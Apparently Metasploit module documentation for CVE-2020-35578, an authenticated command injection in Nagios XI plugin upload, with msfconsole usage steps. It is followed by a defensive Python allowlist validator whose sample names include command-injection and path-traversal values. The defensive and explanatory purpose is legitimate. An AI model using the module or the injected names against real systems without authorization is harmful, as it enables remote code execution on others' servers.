This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php`
page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows
an authenticated admin user to achieve remote code execution as the `apache` user by uploading
a malicious plugin.
Valid credentials for a Nagios XI admin user are required. This module has
been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both
running on CentOS 7.
msf > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
msf exploit(nagios_xi_plugins_filename_authenticated_rce) > show targets
...targets...
msf exploit(nagios_xi_plugins_filename_authenticated_rce) > set TARGET <target-id>
msf exploit(nagios_xi_plugins_filename_authenticated_rce) > show options
...show and set options...
msf exploit(nagios_xi_plugins_filename_authenticated_rce) > exploit
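
For defenders, the plugin-upload flaw described above comes down to client-supplied upload data reaching a shell command. The following is an added example, not code from Nagios XI or from the Metasploit module: it shows an allowlist check on the uploaded file name and an install step that never builds a command string. It assumes the file name is the injected field, as the module name suggests; the function names and the sample names are hypothetical and constructed for illustration.

```python
import os
import re

# Allowlist for plugin file names: letters, digits, dot, underscore, hyphen.
# The first character must be alphanumeric, so a name can never start with
# "-" (option injection) or "." (hidden or relative entries).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def validate_plugin_name(client_name: str) -> str:
    """Return the name if it is safe to use on disk, else raise ValueError."""
    # Reject path components outright instead of silently stripping them.
    if client_name != os.path.basename(client_name.replace("\\", "/")):
        raise ValueError("path separators are not allowed")
    if not SAFE_NAME.fullmatch(client_name):
        raise ValueError("name contains characters outside the allowlist")
    return client_name


def install_plugin(client_name: str, data: bytes, plugin_dir: str) -> str:
    """Store an uploaded plugin without ever handing its name to a shell."""
    name = validate_plugin_name(client_name)
    dest = os.path.join(plugin_dir, name)
    # O_EXCL refuses to overwrite an existing plugin of the same name.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o755)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    os.chmod(dest, 0o755)  # direct syscall, no "chmod <name>" command string
    return dest


def audit_names(names):
    """Return the upload names that the allowlist would reject."""
    rejected = []
    for candidate in names:
        try:
            validate_plugin_name(candidate)
        except ValueError:
            rejected.append(candidate)
    return rejected


# Constructed sample upload names (not taken from the page or the module).
SAMPLE_NAMES = ["check_disk.sh", "check_http", "check_x;id", "$(id).sh",
                "../check_y", "-rf", "check z.pl"]
```

Running `audit_names` over the file names recorded for past plugin uploads gives a quick list of entries worth reviewing on hosts that ran a version prior to 5.8.0.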